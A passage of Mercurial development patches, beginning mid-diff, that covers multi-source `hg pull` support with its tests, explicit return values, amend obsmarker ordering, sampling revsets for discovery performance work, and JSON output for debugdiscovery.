- if top is None or wnode != ctx.node(): - hg.clean(repo, wnode, show_stats=False) - if bname: - bookmarks.activate(repo, bname) - if torebase and top: - dorebase(ui, repo, torebase, top) + wnode = repo[b'.'].node() + top = None + try: + top = dosplit(ui, repo, tr, ctx, opts) + finally: + # top is None: split failed, need update --clean recovery. + # wnode == ctx.node(): wnode split, no need to update. + if top is None or wnode != ctx.node(): + hg.clean(repo, wnode, show_stats=False) + if bname: + bookmarks.activate(repo, bname) + if torebase and top: + dorebase(ui, repo, torebase, top) def dosplit(ui, repo, tr, ctx, opts): # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615390517 -3600 # Wed Mar 10 16:35:17 2021 +0100 # Node ID ce42fe36d5819c038f702ffce3a09c2b4dcedbb5 # Parent 7f6c002d7c0ad34e7b4774c771e60525a9e84f4c tests: move a test about update in test-pull-update.t Differential Revision: https://phab.mercurial-scm.org/D10154 diff --git a/tests/test-pull-update.t b/tests/test-pull-update.t --- a/tests/test-pull-update.t +++ b/tests/test-pull-update.t @@ -246,3 +246,25 @@ active-before-pull 3:483b76ad4309 $ cd .. + +Issue622: hg init && hg pull -u URL doesn't checkout default branch + + $ hg init test + $ cd test + $ echo foo>foo + $ hg addremove + adding foo + $ hg commit -m 1 + $ cd .. + + $ hg init empty + $ cd empty + $ hg pull -u ../test + pulling from ../test + requesting all changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 340e38bdcde4 + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved diff --git a/tests/test-pull.t b/tests/test-pull.t --- a/tests/test-pull.t +++ b/tests/test-pull.t @@ -81,21 +81,6 @@ abort: unknown revision 'ffffffffffff' [255] -Issue622: hg init && hg pull -u URL doesn't checkout default branch - - $ cd .. 
- $ hg init empty - $ cd empty - $ hg pull -u ../test - pulling from ../test - requesting all changes - adding changesets - adding manifests - adding file changes - added 1 changesets with 1 changes to 1 files - new changesets 340e38bdcde4 - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved - Test 'file:' uri handling: $ hg pull -q file://../test-does-not-exist # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615390126 -3600 # Wed Mar 10 16:28:46 2021 +0100 # Node ID bcb5bc2d21e0124b8561fb4d83dcc3d5c0ef1144 # Parent ce42fe36d5819c038f702ffce3a09c2b4dcedbb5 tests: rename `test-pull` to `test-pull-network.t` It is mostly about ssh and http interaction so let's avoid confusion with a generic `hg pull` test Differential Revision: https://phab.mercurial-scm.org/D10155 diff --git a/tests/test-pull.t b/tests/test-pull-network.t rename from tests/test-pull.t rename to tests/test-pull-network.t # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352042 -3600 # Wed Mar 10 05:54:02 2021 +0100 # Node ID af7535249ea958c69d13efc656b7d74dce0dfdd8 # Parent bcb5bc2d21e0124b8561fb4d83dcc3d5c0ef1144 hg: make `clean` return consistent with the `update` function The function returns a boolean and is used as such. Let's be explicit about it. Differential Revision: https://phab.mercurial-scm.org/D10156 diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -1121,6 +1121,7 @@ assert stats.unresolvedcount == 0 if show_stats: _showstats(repo, stats, quietempty) + return False # naming conflict in updatetotally() # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352067 -3600 # Wed Mar 10 05:54:27 2021 +0100 # Node ID 052ab8d0a538dde808984c7fe3f289d16107f3df # Parent af7535249ea958c69d13efc656b7d74dce0dfdd8 command: clarify `postincoming` return and that return handling The command should return None or a return code. 
The previous code was returning boolean directly relying on the fact that `True → 1` and `False → 0`. This is a good road to troubles, so lets be explicit about that return. Differential Revision: https://phab.mercurial-scm.org/D10157 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5256,9 +5256,11 @@ :optupdate: updating working directory is needed or not :checkout: update destination revision (or None to default destination) :brev: a name, which might be a bookmark to be activated after updating + + return True if update raise any conflict, False otherwise. """ if modheads == 0: - return + return False if optupdate: try: return hg.updatetotally(ui, repo, checkout, brev) @@ -5280,6 +5282,7 @@ ui.status(_(b"(run 'hg heads' to see heads)\n")) elif not ui.configbool(b'commands', b'update.requiredest'): ui.status(_(b"(run 'hg update' to get a working copy)\n")) + return False @command( @@ -5366,6 +5369,7 @@ ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) + update_conflict = None try: revs, checkout = hg.addbranchrevs( repo, other, branches, opts.get(b'rev') @@ -5444,7 +5448,7 @@ brev = branches[0] repo._subtoppath = source try: - ret = postincoming( + update_conflict = postincoming( ui, repo, modheads, opts.get(b'update'), checkout, brev ) except error.FilteredRepoLookupError as exc: @@ -5456,7 +5460,10 @@ finally: other.close() - return ret + if update_conflict: + return 1 + else: + return 0 @command( @@ -7546,7 +7553,10 @@ ) modheads = bundle2.combinechangegroupresults(op) - return postincoming(ui, repo, modheads, opts.get('update'), None, None) + if postincoming(ui, repo, modheads, opts.get('update'), None, None): + return 1 + else: + return 0 @command( # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352635 -3600 # Wed Mar 10 06:03:55 2021 +0100 # Node ID 954bad9c32a0ae23ffe009be9084dff5e76d12c2 
# Parent 052ab8d0a538dde808984c7fe3f289d16107f3df pull: pre-indent a part of the function We are about to run it in a loop, so lets pre-indent it to clarify the actual change in the next changesets. Differential Revision: https://phab.mercurial-scm.org/D10158 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5365,101 +5365,104 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - source, branches = hg.parseurl(ui.expandpath(source), opts.get(b'branch')) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) - ui.flush() - other = hg.peer(repo, opts, source) - update_conflict = None - try: - revs, checkout = hg.addbranchrevs( - repo, other, branches, opts.get(b'rev') + if True: + source, branches = hg.parseurl( + ui.expandpath(source), opts.get(b'branch') ) - - pullopargs = {} - - nodes = None - if opts.get(b'bookmark') or revs: - # The list of bookmark used here is the same used to actually update - # the bookmark names, to avoid the race from issue 4689 and we do - # all lookup and bookmark queries in one go so they see the same - # version of the server state (issue 4700). - nodes = [] - fnodes = [] - revs = revs or [] - if revs and not other.capable(b'lookup'): - err = _( - b"other repository doesn't support revision lookup, " - b"so a rev cannot be specified." 
- ) - raise error.Abort(err) - with other.commandexecutor() as e: - fremotebookmarks = e.callcommand( - b'listkeys', {b'namespace': b'bookmarks'} - ) - for r in revs: - fnodes.append(e.callcommand(b'lookup', {b'key': r})) - remotebookmarks = fremotebookmarks.result() - remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) - pullopargs[b'remotebookmarks'] = remotebookmarks - for b in opts.get(b'bookmark', []): - b = repo._bookmarks.expandname(b) - if b not in remotebookmarks: - raise error.InputError( - _(b'remote bookmark %s not found!') % b + ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.flush() + other = hg.peer(repo, opts, source) + update_conflict = None + try: + revs, checkout = hg.addbranchrevs( + repo, other, branches, opts.get(b'rev') + ) + + pullopargs = {} + + nodes = None + if opts.get(b'bookmark') or revs: + # The list of bookmark used here is the same used to actually update + # the bookmark names, to avoid the race from issue 4689 and we do + # all lookup and bookmark queries in one go so they see the same + # version of the server state (issue 4700). + nodes = [] + fnodes = [] + revs = revs or [] + if revs and not other.capable(b'lookup'): + err = _( + b"other repository doesn't support revision lookup, " + b"so a rev cannot be specified." 
+ ) + raise error.Abort(err) + with other.commandexecutor() as e: + fremotebookmarks = e.callcommand( + b'listkeys', {b'namespace': b'bookmarks'} ) - nodes.append(remotebookmarks[b]) - for i, rev in enumerate(revs): - node = fnodes[i].result() - nodes.append(node) - if rev == checkout: - checkout = node - - wlock = util.nullcontextmanager() - if opts.get(b'update'): - wlock = repo.wlock() - with wlock: - pullopargs.update(opts.get(b'opargs', {})) - modheads = exchange.pull( - repo, - other, - heads=nodes, - force=opts.get(b'force'), - bookmarks=opts.get(b'bookmark', ()), - opargs=pullopargs, - confirm=opts.get(b'confirm'), - ).cgresult - - # brev is a name, which might be a bookmark to be activated at - # the end of the update. In other words, it is an explicit - # destination of the update - brev = None - - if checkout: - checkout = repo.unfiltered().changelog.rev(checkout) - - # order below depends on implementation of - # hg.addbranchrevs(). opts['bookmark'] is ignored, - # because 'checkout' is determined without it. 
- if opts.get(b'rev'): - brev = opts[b'rev'][0] - elif opts.get(b'branch'): - brev = opts[b'branch'][0] - else: - brev = branches[0] - repo._subtoppath = source - try: - update_conflict = postincoming( - ui, repo, modheads, opts.get(b'update'), checkout, brev - ) - except error.FilteredRepoLookupError as exc: - msg = _(b'cannot update to target: %s') % exc.args[0] - exc.args = (msg,) + exc.args[1:] - raise - finally: - del repo._subtoppath - - finally: - other.close() + for r in revs: + fnodes.append(e.callcommand(b'lookup', {b'key': r})) + remotebookmarks = fremotebookmarks.result() + remotebookmarks = bookmarks.unhexlifybookmarks(remotebookmarks) + pullopargs[b'remotebookmarks'] = remotebookmarks + for b in opts.get(b'bookmark', []): + b = repo._bookmarks.expandname(b) + if b not in remotebookmarks: + raise error.InputError( + _(b'remote bookmark %s not found!') % b + ) + nodes.append(remotebookmarks[b]) + for i, rev in enumerate(revs): + node = fnodes[i].result() + nodes.append(node) + if rev == checkout: + checkout = node + + wlock = util.nullcontextmanager() + if opts.get(b'update'): + wlock = repo.wlock() + with wlock: + pullopargs.update(opts.get(b'opargs', {})) + modheads = exchange.pull( + repo, + other, + heads=nodes, + force=opts.get(b'force'), + bookmarks=opts.get(b'bookmark', ()), + opargs=pullopargs, + confirm=opts.get(b'confirm'), + ).cgresult + + # brev is a name, which might be a bookmark to be activated at + # the end of the update. In other words, it is an explicit + # destination of the update + brev = None + + if checkout: + checkout = repo.unfiltered().changelog.rev(checkout) + + # order below depends on implementation of + # hg.addbranchrevs(). opts['bookmark'] is ignored, + # because 'checkout' is determined without it. 
+ if opts.get(b'rev'): + brev = opts[b'rev'][0] + elif opts.get(b'branch'): + brev = opts[b'branch'][0] + else: + brev = branches[0] + repo._subtoppath = source + try: + update_conflict = postincoming( + ui, repo, modheads, opts.get(b'update'), checkout, brev + ) + except error.FilteredRepoLookupError as exc: + msg = _(b'cannot update to target: %s') % exc.args[0] + exc.args = (msg,) + exc.args[1:] + raise + finally: + del repo._subtoppath + + finally: + other.close() if update_conflict: return 1 else: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615352581 -3600 # Wed Mar 10 06:03:01 2021 +0100 # Node ID 685383486d0ad846232dcb7d8040375ec508907d # Parent 954bad9c32a0ae23ffe009be9084dff5e76d12c2 pull: allow to specify multiple sources I end up needing that on a regular basis and it turn out to be very simple to implement. See documentation and test for details. Differential Revision: https://phab.mercurial-scm.org/D10159 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5323,11 +5323,11 @@ ), ] + remoteopts, - _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]'), + _(b'[-u] [-f] [-r REV]... [-e CMD] [--remotecmd CMD] [SOURCE]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def pull(ui, repo, source=b"default", **opts): +def pull(ui, repo, *sources, **opts): """pull changes from the specified source Pull changes from a remote repository to a local one. @@ -5351,6 +5351,10 @@ If SOURCE is omitted, the 'default' path will be used. See :hg:`help urls` for more information. + If multiple sources are specified, they will be pulled sequentially as if + the command was run multiple time. If --update is specify and the command + will stop at the first failed --update. + Specifying bookmark as ``.`` is equivalent to specifying the active bookmark's name. 
@@ -5365,7 +5369,9 @@ hint = _(b'use hg pull followed by hg update DEST') raise error.InputError(msg, hint=hint) - if True: + if not sources: + sources = [b'default'] + for source in sources: source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) @@ -5463,6 +5469,9 @@ finally: other.close() + # skip the remaining pull source if they are some conflict. + if update_conflict: + break if update_conflict: return 1 else: diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t new file mode 100644 --- /dev/null +++ b/tests/test-exchange-multi-source.t @@ -0,0 +1,315 @@ +==================================================== +Test push/pull from multiple source at the same time +==================================================== + + +Setup +===== + +main repository +--------------- + + $ . $RUNTESTDIR/testlib/common.sh + $ hg init main-repo + $ cd main-repo + $ mkcommit A + $ mkcommit B + $ mkcommit C + $ mkcommit D + $ mkcommit E + $ hg up 'desc(B)' + 0 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ mkcommit F + created new head + $ mkcommit G + $ hg up 'desc(C)' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ mkcommit H + created new head + $ hg up null --quiet + $ hg log -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ cd .. 
+ +Various other repositories +-------------------------- + + $ hg clone main-repo branch-E --rev 4 -U + adding changesets + adding manifests + adding file changes + added 5 changesets with 5 changes to 5 files + new changesets 4a2df7238c3b:a603bfb5a83e + $ hg clone main-repo branch-G --rev 6 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:c521a06b234b + $ hg clone main-repo branch-H --rev 7 -U + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 4a2df7238c3b:40faebb2ec45 + +Test simple bare operation +========================== + + $ hg clone main-repo test-repo-bare --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + + $ hg pull -R test-repo-bare ./branch-E ./branch-G ./branch-H + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' 
to see heads, 'hg merge' to merge) + $ hg log -R test-repo-bare -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +Test operation with a target +============================ + + $ hg clone main-repo test-repo-rev --rev 0 -U + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + +pulling an explicite revision + + $ node_b=`hg log -R main-repo --rev 'desc(B)' -T '{node}'` + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev $node_b + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 27547f69f254 + (run 'hg update' to get a working copy) + pulling from ./branch-G + no changes found + pulling from ./branch-H + no changes found + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o B 1 + | + o A 0 + + +pulling a branch head, the branch head resolve to different revision on the +different repositories. + + $ hg pull -R test-repo-rev ./branch-E ./branch-G ./branch-H --rev default + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files + new changesets f838bfaca5c7:a603bfb5a83e + (run 'hg update' to get a working copy) + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + (run 'hg heads' to see heads, 'hg merge' to merge) + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + (run 'hg heads .' 
to see heads, 'hg merge' to merge) + $ hg log -R test-repo-rev -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + + +Test with --update +================== + +update without conflicts +------------------------ + + $ hg clone main-repo test-repo-update --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +We update for each pull, so the first on get into a branch independant from the +other and stay there. This is the expected behavior. + + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-update ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + 4 files updated, 0 files merged, 0 files removed, 0 files unresolved + pulling from ./branch-G + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + new changesets 2f3a4c5c1417:c521a06b234b + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 1 other heads for branch "default" + pulling from ./branch-H + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + new changesets 40faebb2ec45 + 0 files updated, 0 files merged, 0 files removed, 0 files unresolved + updated to "a603bfb5a83e: E" + 2 other heads for branch "default" + $ hg log -R test-repo-update -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | @ E 4 + | | + | o D 3 + |/ 
+ o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + +update with conflicts +--------------------- + + $ hg clone main-repo test-repo-conflict --rev 0 + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files + new changesets 4a2df7238c3b + updating to branch default + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + +The update has conflict and interrupt the pull. + + $ echo this-will-conflict > test-repo-conflict/D + $ hg add -R test-repo-conflict test-repo-conflict/D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ A 0 + + $ hg pull -R test-repo-conflict ./branch-E ./branch-G ./branch-H --update + pulling from ./branch-E + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files + new changesets 27547f69f254:a603bfb5a83e + merging D + warning: conflicts while merging D! (edit, then use 'hg resolve --mark') + 3 files updated, 0 files merged, 0 files removed, 1 files unresolved + use 'hg resolve' to retry unresolved file merges + [1] + $ hg -R test-repo-conflict resolve -l + U D + $ hg log -R test-repo-conflict -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + @ E 4 + | + o D 3 + | + o C 2 + | + o B 1 + | + % A 0 + diff --git a/tests/testlib/common.sh b/tests/testlib/common.sh new file mode 100644 --- /dev/null +++ b/tests/testlib/common.sh @@ -0,0 +1,7 @@ +mkcommit() { + name="$1" + shift + echo "$name" > "$name" + hg add "$name" + hg ci -m "$name" "$@" +} # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1551225260 28800 # Tue Feb 26 15:54:20 2019 -0800 # Node ID 62c2857a174b0d4593ec0e4d5df99c5518fdbc9a # Parent 685383486d0ad846232dcb7d8040375ec508907d amend: mark commit obsolete after moving working copy We were doing it this way: 1. move working copy (repo.setparents) 2. add obsmarkers (scmutil.cleanupnodes) 3. 
fix dirstate (dirstate.normal/drop) Step 1 and 3 are closely related, so let's move them together. It seems safest to create the obsmarkers last. This patch thus makes the order 1, 3, 2. Differential Revision: https://phab.mercurial-scm.org/D10197 diff --git a/mercurial/cmdutil.py b/mercurial/cmdutil.py --- a/mercurial/cmdutil.py +++ b/mercurial/cmdutil.py @@ -2967,20 +2967,6 @@ # Reroute the working copy parent to the new changeset repo.setparents(newid, nullid) - mapping = {old.node(): (newid,)} - obsmetadata = None - if opts.get(b'note'): - obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} - backup = ui.configbool(b'rewrite', b'backup-bundle') - scmutil.cleanupnodes( - repo, - mapping, - b'amend', - metadata=obsmetadata, - fixphase=True, - targetphase=commitphase, - backup=backup, - ) # Fixing the dirstate because localrepo.commitctx does not update # it. This is rather convenient because we did not need to update @@ -3003,6 +2989,21 @@ for f in removedfiles: dirstate.drop(f) + mapping = {old.node(): (newid,)} + obsmetadata = None + if opts.get(b'note'): + obsmetadata = {b'note': encoding.fromlocal(opts[b'note'])} + backup = ui.configbool(b'rewrite', b'backup-bundle') + scmutil.cleanupnodes( + repo, + mapping, + b'amend', + metadata=obsmetadata, + fixphase=True, + targetphase=commitphase, + backup=backup, + ) + return newid # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615822554 -3600 # Mon Mar 15 16:35:54 2021 +0100 # Node ID cb70dabe57189d796776e565e5b8f1e5c2cdd4a9 # Parent 62c2857a174b0d4593ec0e4d5df99c5518fdbc9a perf-helper: add a small extension with revsets to select repository subset Playing with discovery requires building interesting case. To do this we need revsets to try to generate them. We start with a quite simple one. See documentation for details. 
Differential Revision: https://phab.mercurial-scm.org/D10221 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py new file mode 100644 --- /dev/null +++ b/contrib/perf-utils/subsetmaker.py @@ -0,0 +1,94 @@ +"""revset to select sample of repository + +Hopefully this is useful to create interesting discovery cases. +""" + +import collections +import random + +from mercurial.i18n import _ + +from mercurial import ( + registrar, + revset, + revsetlang, + smartset, +) + +revsetpredicate = registrar.revsetpredicate() + + +@revsetpredicate(b'scratch(REVS, <count>, [seed])') +def scratch(repo, subset, x): + """randomly remove <count> revision from the repository top + + This subset is created by recursively picking changeset starting from the + heads. It can be summarized using the following algorithm:: + + selected = set() + for i in range(<count>): + unselected = repo.revs("not <selected>") + candidates = repo.revs("heads(<unselected>)") + pick = random.choice(candidates) + selected.add(pick) + """ + m = _(b"scratch expects revisions, count argument and an optional seed") + args = revsetlang.getargs(x, 2, 3, m) + if len(args) == 2: + x, n = args + rand = random + elif len(args) == 3: + x, n, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + n = revsetlang.getinteger(n, _(b"scratch expects a number")) + + selected = set() + heads = set() + children_count = collections.defaultdict(lambda: 0) + parents = repo.changelog._uncheckedparentrevs + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + baseset.sort() + for r in baseset: + heads.add(r) + + p1, p2 = parents(r) + if p1 >= 0: + heads.discard(p1) + children_count[p1] += 1 + if p2 >= 0: + heads.discard(p2) + children_count[p2] += 1 + + for h in heads: + assert children_count[h] == 0 + + selected = set() + for x in range(n): + if not heads: + break + pick = rand.choice(list(heads)) + 
heads.remove(pick) + assert pick not in selected + selected.add(pick) + p1, p2 = parents(pick) + if p1 in children_count: + assert p1 in children_count + children_count[p1] -= 1 + assert children_count[p1] >= 0 + if children_count[p1] == 0: + assert p1 not in selected, (r, p1) + heads.add(p1) + if p2 in children_count: + assert p2 in children_count + children_count[p2] -= 1 + assert children_count[p2] >= 0 + if children_count[p2] == 0: + assert p2 not in selected, (r, p2) + heads.add(p2) + + return smartset.baseset(selected) & subset # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615822631 -3600 # Mon Mar 15 16:37:11 2021 +0100 # Node ID 36b4640ccb6a8ecbee0a97d878a7f42b38e11f80 # Parent cb70dabe57189d796776e565e5b8f1e5c2cdd4a9 perf-helper: add a new sampling revset based on anti-chain See inline documentation for details. Differential Revision: https://phab.mercurial-scm.org/D10222 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py --- a/contrib/perf-utils/subsetmaker.py +++ b/contrib/perf-utils/subsetmaker.py @@ -92,3 +92,48 @@ heads.add(p2) return smartset.baseset(selected) & subset + + +@revsetpredicate(b'randomantichain(REVS, [seed])') +def antichain(repo, subset, x): + """Pick a random anti-chain in the repository + + A antichain is a set of changeset where there isn't any element that is + either a descendant or ancestors of any other element in the set. In other + word, all the elements are independant. 
It can be summarized with the + following algorithm:: + + selected = set() + unselected = repo.revs('all()') + while unselected: + pick = random.choice(unselected) + selected.add(pick) + unselected -= repo.revs('::<pick> + <pick>::') + """ + + args = revsetlang.getargs( + x, 1, 2, _(b"randomantichain expects revisions and an optional seed") + ) + if len(args) == 1: + (x,) = args + rand = random + elif len(args) == 2: + x, seed = args + seed = revsetlang.getinteger(seed, _(b"seed should be a number")) + rand = random.Random(seed) + else: + assert False + + selected = set() + + baseset = revset.getset(repo, smartset.fullreposet(repo), x) + undecided = baseset + + while undecided: + pick = rand.choice(list(undecided)) + selected.add(pick) + undecided = repo.revs( + '%ld and not (::%ld or %ld::head())', baseset, selected, selected + ) + + return smartset.baseset(selected) & subset # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615823703 -3600 # Mon Mar 15 16:55:03 2021 +0100 # Node ID 3a8cf5b9c8204aec5212d5aaf6263c66ce823a4b # Parent 36b4640ccb6a8ecbee0a97d878a7f42b38e11f80 debugdiscovery: add support for Json output They are some pre-output that will be impractical, I'll take care of it in the next changeset. 
Differential Revision: https://phab.mercurial-scm.org/D10223 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -998,7 +998,8 @@ 'use local as remote, with only these these revisions', ), ] - + cmdutil.remoteopts, + + cmdutil.remoteopts + + cmdutil.formatteropts, _(b'[--rev REV] [OTHER]'), ) def debugdiscovery(ui, repo, remoteurl=b"default", **opts): @@ -1140,50 +1141,42 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) + fm = ui.formatter(b'debugdiscovery', opts) + fm.startitem() + fm.data(**pycompat.strkwargs(data)) # display discovery summary - ui.writenoi18n(b"elapsed time: %(elapsed)f seconds\n" % data) - ui.writenoi18n(b"round-trips: %(total-roundtrips)9d\n" % data) - ui.writenoi18n(b"heads summary:\n") - ui.writenoi18n(b" total common heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n( - b" also local heads: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" also remote heads: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n(b" both: %(nb-common-heads-both)9d\n" % data) - ui.writenoi18n(b" local heads: %(nb-head-local)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-local)9d\n" % data - ) - ui.writenoi18n( - b" missing: %(nb-head-local-missing)9d\n" % data - ) - ui.writenoi18n(b" remote heads: %(nb-head-remote)9d\n" % data) - ui.writenoi18n( - b" common: %(nb-common-heads-remote)9d\n" % data - ) - ui.writenoi18n( - b" unknown: %(nb-head-remote-unknown)9d\n" % data - ) - ui.writenoi18n(b"local changesets: %(nb-revs)9d\n" % data) - ui.writenoi18n(b" common: %(nb-revs-common)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-common-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-common-roots)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-revs-missing)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-missing-heads)9d\n" % data) - ui.writenoi18n(b" roots: 
%(nb-missing-roots)9d\n" % data) - ui.writenoi18n(b" first undecided set: %(nb-ini_und)9d\n" % data) - ui.writenoi18n(b" heads: %(nb-ini_und-heads)9d\n" % data) - ui.writenoi18n(b" roots: %(nb-ini_und-roots)9d\n" % data) - ui.writenoi18n(b" common: %(nb-ini_und-common)9d\n" % data) - ui.writenoi18n(b" missing: %(nb-ini_und-missing)9d\n" % data) + fm.plain(b"elapsed time: %(elapsed)f seconds\n" % data) + fm.plain(b"round-trips: %(total-roundtrips)9d\n" % data) + fm.plain(b"heads summary:\n") + fm.plain(b" total common heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" also local heads: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" also remote heads: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" both: %(nb-common-heads-both)9d\n" % data) + fm.plain(b" local heads: %(nb-head-local)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-local)9d\n" % data) + fm.plain(b" missing: %(nb-head-local-missing)9d\n" % data) + fm.plain(b" remote heads: %(nb-head-remote)9d\n" % data) + fm.plain(b" common: %(nb-common-heads-remote)9d\n" % data) + fm.plain(b" unknown: %(nb-head-remote-unknown)9d\n" % data) + fm.plain(b"local changesets: %(nb-revs)9d\n" % data) + fm.plain(b" common: %(nb-revs-common)9d\n" % data) + fm.plain(b" heads: %(nb-common-heads)9d\n" % data) + fm.plain(b" roots: %(nb-common-roots)9d\n" % data) + fm.plain(b" missing: %(nb-revs-missing)9d\n" % data) + fm.plain(b" heads: %(nb-missing-heads)9d\n" % data) + fm.plain(b" roots: %(nb-missing-roots)9d\n" % data) + fm.plain(b" first undecided set: %(nb-ini_und)9d\n" % data) + fm.plain(b" heads: %(nb-ini_und-heads)9d\n" % data) + fm.plain(b" roots: %(nb-ini_und-roots)9d\n" % data) + fm.plain(b" common: %(nb-ini_und-common)9d\n" % data) + fm.plain(b" missing: %(nb-ini_und-missing)9d\n" % data) if ui.verbose: - ui.writenoi18n( + fm.plain( b"common heads: %s\n" % b" ".join(sorted(short(n) for n in heads_common)) ) + fm.end() _chunksize = 4 << 10 